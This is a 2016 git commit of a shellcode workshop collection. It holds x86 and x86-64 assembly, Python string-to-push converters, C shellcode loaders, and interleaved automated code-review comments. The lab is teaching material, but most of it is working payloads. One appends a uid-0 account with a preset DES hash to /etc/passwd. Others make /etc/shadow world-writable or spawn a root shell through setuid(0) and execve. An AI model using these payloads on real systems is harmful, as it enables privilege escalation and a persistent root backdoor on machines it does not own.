This commit is contained in:
Daniel Ashton
2016-05-30 09:06:47 +02:00
commit cc0cee84ff
27 changed files with 555 additions and 0 deletions

16
README Normal file

@@ -0,0 +1,16 @@
_____ __ __ ___ _ _ __ ___ ___ ___ _ ____ ____
/ ___/| | | / _]| | | | / ] / \ | \ / _] | | / || \
( \_ | | | / [_ | | | | / / | || \ / [_ _____ | | | o || o )
\__ || _ || _]| |___ | |___ / / | O || D || _] || |___ | || |
/ \ || | || [_ | || / \_ | || || [_|_____|| || _ || O |
\ || | || || || \ || || || | | || | || |
\___||__|__||_____||_____||_____|\____| \___/ |_____||_____| |_____||__|__||_____|
Collection of Shellcode Lab Sessions at from different cons the past years. Consists of PDF Slides and Example codes.
x86_32 - This is the Shellcode Lab for IA-32 saying 32Bit Intel CPUs
x86_64 - This is the Shellcode Lab for IA-64 saying 64Bit CPUs
Cheers
dash


@@ -0,0 +1,53 @@
; shellcode lab @ hack4
; dash
BITS 32
global _start
_start:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
mov eax, 5
push ebx
push 0x64777373
push 0x61702f63
push 0x74652f2f
mov ebx, esp
mov ecx, 0x401
int 0x80
; take filedescriptor
xor ebx, ebx
mov ebx, eax
; write(f_open, line, 24)
xor eax, eax
xor ecx, ecx
mov eax, 4
push ecx
push byte 0x0a
push 0x68736162
push 0x2f6e6962
push 0x2f3a746f
push 0x6f722f3a
push 0x3a303a30
push 0x3a494e73
push 0x386b5a39
push 0x65736d48
push 0x42413a72
push 0x336b6361
push 0x68316f6e
mov ecx, esp
mov edx, 45
int 0x80
;close maybe?? ah forget that :>
; exit(23)
mov eax, 1
mov ebx, 23
int 0x80


@@ -0,0 +1,21 @@
#!/usr/bin/env python
#
# ascii converter for shellcoding-lab at hack4
# ~dash in 2014
#
import sys
import binascii
text = sys.argv[1]
def usage():
print "./%s <string2convert>" % (sys.argv[0])
if len(sys.argv)<2:
usage()
exit()
val = binascii.hexlify(text[::-1])
print "Stringlen: %d" % len(text)
print "String: %s" % val
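Review bot: `text = sys.argv[1]` runs before the `len(sys.argv)<2` guard, so calling the script without an argument dies with IndexError instead of printing the usage line; move the assignment below `exit()` (the crypt tool in this commit already has the right order). The next file section, the converter variant with the push-printing loop, repeats the same ordering problem, and in its loop `i=i+1` does not advance the loop because the for statement reassigns i on every pass — it only feeds `k = i % 8`, which `k = (i + 1) % 8` states directly. Both scripts are Python 2 (print statements, hexlify of a str slice) but this shebang says `python`, which may resolve to Python 3; `python2`, as the crypt tool uses, pins the interpreter the code was written for.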


@@ -0,0 +1,29 @@
#!/usr/bin/env python
import sys
import binascii
text = sys.argv[1]
def usage():
print "./%s <string2convert>" % (sys.argv[0])
if len(sys.argv)<2:
usage()
exit()
val = binascii.hexlify(text[::-1])
print "Stringlen: %d" % len(text)
print "String: %s" % val
print
for i in range(len(val)):
if i % 8 == 0:
print "push 0x",
print "\b%c" % val[i],
i=i+1
k = i % 8
if k == 0:
print


@@ -0,0 +1,21 @@
global _start
section .text
_start:
;setuid
xor eax, eax
mov ebx, eax
mov eax, 11
int 0x80
;execve
xor ecx, ecx
push ecx
push 0x69732f2f
push 0x6e69622f
mov ebx, esp
mov edx, 0x00000000
xor eax, eax
mov eax, 11
int 0x80


@@ -0,0 +1,27 @@
; shellcodelab@hack4
; by dash
BITS 32
global _start
_start:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
;chmod
mov ecx, 0x1ff ;0777
push ebx ;null terminator
push 0x776f6461 ;/etc/shadow
push 0x68732f63
push 0x74652f2f
mov ebx, esp ;put the address of esp to ebx (shadow)
mov eax, 15
int 0x80
;exit
xor eax, eax
xor ebx, ebx
mov eax, 1
int 0x80


@@ -0,0 +1,26 @@
; shellcode-lab@hack4
; by dash
BITS 32
global _start
_start:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
;chmod
mov cx, 0x1ff ;0777
push ebx ;null terminator
push 0x776f6461 ;/etc/shadow
push 0x68732f63
push 0x74652f2f
mov ebx, esp ;put the address of esp to ebx (shadow)
mov al, 15
int 0x80
;exit
xor eax, eax
xor ebx, ebx
mov al, 1
int 0x80


@@ -0,0 +1,19 @@
#!/usr/bin/env python2
#
# crypt des tool for shellcoding lab at hack4
# ~dash
import sys
import crypt
def usage():
print "%s <password>" % (sys.argv[0])
if len(sys.argv)<2:
usage()
exit()
password = sys.argv[1]
pw = crypt.crypt(password,'AB')
print "Password: %s" % pw
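Review bot: `crypt.crypt(password,'AB')` fixes the salt to the constant `AB`, so every run yields the same hash for the same password, and a two-character salt selects the traditional DES crypt, which only looks at the first eight characters of the password. That is acceptable for a lab tool as long as it is stated, so add a comment above the call such as `# fixed salt 'AB' selects traditional DES crypt: deterministic output, only the first 8 password chars count`. The usage guard here is in the right order (the argv read comes after the length check), unlike the two converter scripts in this commit.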


@@ -0,0 +1,20 @@
/* shell.c
simple shell for shellcoding-lab at hack4 0x1
probably ripped somewhere
~dash
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
int main(){
char *args[2];
setuid(0);
args[0] = "/bin/sh";
args[1] = NULL;
execve(args[0], args, NULL);
}
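Review bot: the return values of `setuid(0)` and `execve` are ignored, so when the binary is not set-uid root the shell still starts with the caller's privileges, and when execve fails main falls off the end and returns 0 as if it had succeeded. Check both: `if (setuid(0) != 0) return 1;` before the args are built, and `execve(args[0], args, NULL); return 1;` at the end, since execve only returns on failure. `stdio.h` is included but nothing from it is used.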


@@ -0,0 +1,26 @@
#include <string.h>
#include <sys/mman.h>
char shellcode[] = "";
int main(int argc, char **argv)
{
// Allocate some read-write memory
void *mem = mmap(0, sizeof(shellcode), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
// Copy the shellcode into the new memory
memcpy(mem, shellcode, sizeof(shellcode));
// Make the memory read-execute
mprotect(mem, sizeof(shellcode), PROT_READ|PROT_EXEC);
// Call the shellcode
int (*func)();
func = (int (*)())mem;
(int)(*func)();
// Now, if we managed to return here, it would be prudent to clean up the memory:
munmap(mem, sizeof(shellcode));
return 0;
}
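Review bot: `mmap` can return `MAP_FAILED` and `mprotect` can fail (for example under a policy that refuses to make writable pages executable), yet both results are ignored, so the loader would memcpy into `(void *)-1` or jump into non-executable memory and die with a misleading signal. Add `if (mem == MAP_FAILED) return 1;` after the mmap and `if (mprotect(mem, sizeof(shellcode), PROT_READ|PROT_EXEC) != 0) return 1;` after the mprotect. The `(int)` cast in `(int)(*func)();` does nothing; `func();` reads the same. The allocate-RW, copy, then flip-to-RX sequence is the right pattern and deserves a comment saying it is deliberate, so nobody "simplifies" it to a single `PROT_READ|PROT_WRITE|PROT_EXEC` mapping.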


@@ -0,0 +1,15 @@
#include <stdio.h>
#include <string.h>
#include <unistd.h>
char shellcode[] = "";
int main(void)
{
int *ret;
printf("%d\n",strlen(shellcode));
ret = (int *)&ret+2;
*ret = (int)shellcode;
return 0;
}
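Review bot: `ret = (int *)&ret+2; *ret = (int)shellcode;` assumes a 32-bit build with a frame layout in which main's saved return address sits exactly two ints above `ret`; on x86-64 `(int)shellcode` truncates the pointer and the offset is wrong, and any stack-protector or optimisation change moves the slot, so the program simply faults. Since the same commit ships the mmap/mprotect loader, this variant should at least carry a header comment like `/* 32-bit only: relies on main's saved return address being two ints above ret; compiler/frame-layout dependent */`. `printf("%d\n",strlen(shellcode))` also passes a size_t to `%d`; use `%zu`.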

Binary file not shown.


@@ -0,0 +1,18 @@
; 8 bit registers 'undocumented', test
; dash@hack4.org
; May 2016
;
; wikipedia, shellcode trainings no access to certain cpu registers in 8 bit mode
; however, they are addressable
; just adding right now a l to 16bit registers
;
BITS 64
global _start
_start:
mov spl, 1
mov bpl, 2
mov sil, 3
mov dil, 4
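Review bot: none of the BITS 64 snippets in this commit that consist only of data movement — this one, the two "byte placements" files, the "zero-out" file, the kill-only file, the two push examples and the xchg example — issues an exit syscall, so after the last instruction execution runs off the end of .text and the process is killed with SIGSEGV (or executes whatever bytes happen to follow). Either end each with the exit sequence the "exit example" file already uses (`xor rax,rax` / `mov al,0x3C` / `syscall`, with rdi holding the status) or state the intent at the top, e.g. `; no exit on purpose: expect SIGSEGV after the last mov, inspect registers in the debugger`. In this file the first instruction also overwrites the low byte of rsp, after which the stack is unusable; that deserves its own comment since it is the one register here whose clobbering has a side effect beyond the test.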


@@ -0,0 +1,22 @@
; shellcode-lab64bit
; dash@hack4.org
; byte placements on 64 bit - example for new register r10
BITS 64
global _start
_start:
; former general purpose register
sub r10, r10
mov r10, 0x4142434445464748
sub r10, r10
mov r10d, 0x41424344
sub r10d, r10d
mov r10w, 0x4142
sub r10w, r10w
mov r10b,0x42
sub r10b, r10b


@@ -0,0 +1,28 @@
; shellcode-lab64bit
; dash@hack4.org
; byte placements on 64 bit - example
BITS 64
global _start
_start:
; former general purpose register, example
; sub is used to clear out the register
sub rax, rax
mov rax, 0x4142434445464748
sub rax, rax
mov eax, 0x41424344
sub eax, eax
; address 16bit
mov ax, 0x4142
; overwrite the higher byte of ax
; 0x4142 gets to 0x2d42
mov ah,0x2d
sub ah, ah
mov al,0x41
sub al, al


@@ -0,0 +1,22 @@
; shellcode-lab64
; dash@hack4.org
;
; some example to zero-out a register
BITS 64
global _start
_start:
xor rax, rax ; initial clearing - classic xor
mov rax, 0xDEADBEEF
sub rax, rax ; sub opcode
mov rax, 0xF00DBABE
xor rax, rax ; classic xor
; check value of register and add or sub from that
; let's assume 29A is in the register rcx
sub rcx, rcx
mov rcx, 0x29A
sub rcx, 666
; zero'd


@@ -0,0 +1,21 @@
BITS 64
global _start
_start:
xor rax, rax
push rax ; null terminator for the string
mov rbx, 0x68732f6e69622f2f ; //bin/sh backwards
push rbx ;
mov rdi, rsp ; move address from stack pointer to first argument
push rax
push rdi ; actually we would not need this one
mov rsi, rsp ; move the address to the 2nd argument
mov rdx, rax ; no envp necessary
mov al,0x3B ; execve into rax
syscall


@@ -0,0 +1,29 @@
BITS 64
global _start
_start:
xor rax, rax
push rax ; push the cleared register
pop rdi ; pop the zer0z into 1st argument
add al,0x69 ; setuid 105 or 0x69h
syscall ; call setuid(0)
xor rax, rax
push rax ; null terminator for the string
mov rbx, 0x68732f6e69622f2f ; //bin/sh backwards
push rbx ;
mov rdi, rsp ; move address from stack pointer to first argument
push rax
push rdi ; actually we would not need this one
mov rsi, rsp ; move the address to the 2nd argument
mov rdx, rax ; no envp necessary
mov al,0x3B ; execve into rax
syscall


@@ -0,0 +1,14 @@
; shellcode lab 64Bit
; exit example as it should be ;)
; dsah@hack4.org
;
BITS 64
global _start
_start:
xor rax,rax
xor rdx,rdx
mov al,0x3C
mov dil,4
syscall
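Review bot: `xor rdx,rdx` clears a register that exit(2) never reads, while rdi — whose low byte `mov dil,4` sets — is only partially written; replace it with `xor edi,edi` (which also zeroes the upper half of rdi) so the example shows the argument register being prepared. The sibling "exit code with null bytes" file has the same mix-up one step further: it loads the status with `mov rdx,4`, but the first syscall argument on x86-64 is rdi, so its exit status is whatever rdi held at entry (in practice 0 under Linux's ELF entry convention) rather than 4. The author line reads `dsah@hack4.org`, presumably a typo for the dash@hack4.org used in the other files.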


@@ -0,0 +1,16 @@
; shellcode-lab 64Bit
; dash@hack4.org
; exit code with null bytes
;
BITS 64
global _start
_start:
xor rax,rax
xor rdx,rdx
mov rax,0x3C
mov rdx,4
syscall


@@ -0,0 +1,27 @@
; shellcode-lab 64Bit
; dash@hack4.org
; kill + exit
;
BITS 64
global _start
_start:
xor rax, rax
xor rdi, rdi
xor rsi, rsi
mov dil, 1368
mov sil,9
mov al, 62
syscall
xor rax, rax
xor rdi, rdi
add dil, 4
mov al, 60
syscall
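Review bot: `mov dil, 1368` cannot hold its immediate: 1368 needs 11 bits, NASM warns that the byte data exceeds bounds and encodes only the low byte 0x58, so the kill syscall is issued for pid 88, not 1368. Load the pid into the full register instead (`mov edi, 1368`, which zero-extends into rdi and makes the preceding `xor rdi, rdi` redundant), or, if the example is meant to stay within byte-sized immediates, say so in a comment and use a value that fits. `mov sil,9` and `mov al, 62` are fine because SIGKILL and the kill syscall number fit in a byte.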


@@ -0,0 +1,18 @@
; shellcode-lab64bit
; dash@hack4.org
; don't execute that as root, as long as adjusted
;
BITS 64
global _start
_start:
xor rax, rax
xor rdi, rdi
xor rsi, rsi
mov dil, 1 ; you might not want to run that as root
mov sil,9
mov al, 62
syscall


@@ -0,0 +1,16 @@
; shellcode-lab64
; dash@hack4.org
; push example and 8byte fun on 64bit architecture
;
BITS 64
global _start
_start:
push byte 0x41
push word 0x4142
push dword 0x41424344
; let's comment that out
; comment it in to see the compile error
;push 0x4142434445464748
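Review bot: the size keywords here do not do what a reader of "byte/word/dword" would expect in 64-bit mode, and the comments do not say so: `push byte 0x41` and `push dword 0x41424344` both push 8 bytes (the immediate is sign-extended to 64 bits), only `push word 0x4142` pushes 2 bytes via a 0x66 operand-size prefix, and there is no push encoding for a 64-bit immediate at all, which is the compile error the last comment alludes to. Suggest replacing the comments with `; imm8 -> 8 bytes on the stack (sign-extended)`, `; imm16 -> 2 bytes (0x66 prefix)` and `; imm32 -> 8 bytes (sign-extended); no imm64 form exists, hence the error below`. The companion file that loads the value into rax and pushes the register is the correct way to get 8 arbitrary bytes onto the stack and could be cross-referenced from here.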


@@ -0,0 +1,14 @@
; shellcode-lab64
; dash@hack4.org
; push example and 8byte fun on 64bit architecture
; use mov to bring up your 8byte value on the stack
;
BITS 64
global _start
_start:
xor rax, rax ; clear register
mov rax, 0x4142434445464748 ; place 8byte in register rax
push rax ; push it onto the stack


@@ -0,0 +1,17 @@
/* shellcode-lab 64Bit
dash@hack4.org
use -z execstack
or set char code to const
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] ="shellcode wants to be placed here!";
main()
{
printf("Shellcode Len: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
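Review bot: `main()` with no return type relies on implicit int, which C99 dropped, and `strlen(code)` passes an `unsigned char *` where `const char *` is expected, so a conforming compiler emits diagnostics before the program even runs; write `int main(void)` and `strlen((const char *)code)`. The header comment's second option, making `code` `const`, is doubtful: on the toolchains I know const moves the array to read-only data, which is not executable on a normal link either, so `-z execstack` (or the mmap/mprotect loader elsewhere in this commit) is what actually matters — I would reword the comment rather than present the two as equivalent. `ret` is a misleading name for the function pointer; `entry` reads better.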


@@ -0,0 +1,20 @@
; xchg example code
; dash@hack4.org
; shellcode lab
; may 2016
BITS 64
global _start
_start:
xor rax, rax
xor rbx, rbx
mov rax, 0x29A ; http://web.textfiles.com/ezines/29A/
mov rbx, 0x539
mov r10, 0xBEEFBEEFBEEFBEEF
xchg rax, r10
xchg r10, r9
xchg rbx, rax
xchg rdi,rsp
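Review bot: `xchg rdi,rsp` leaves rsp holding whatever rdi contained and rdi holding the old stack pointer, so from that instruction on the stack is unusable — the next push, call or return faults — and the file then runs off the end of .text with no exit syscall. If that is the demonstration, say so: `; rsp is now garbage on purpose: nothing after this may touch the stack`; otherwise follow it with a second `xchg rdi,rsp` to restore it. `xchg r10, r9` also swaps in r9, which nothing initialised, so r10's content afterwards depends on the process entry state rather than on the example; a comment to that effect, or an explicit `xor r9, r9` first, would make the trace predictable.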

Binary file not shown.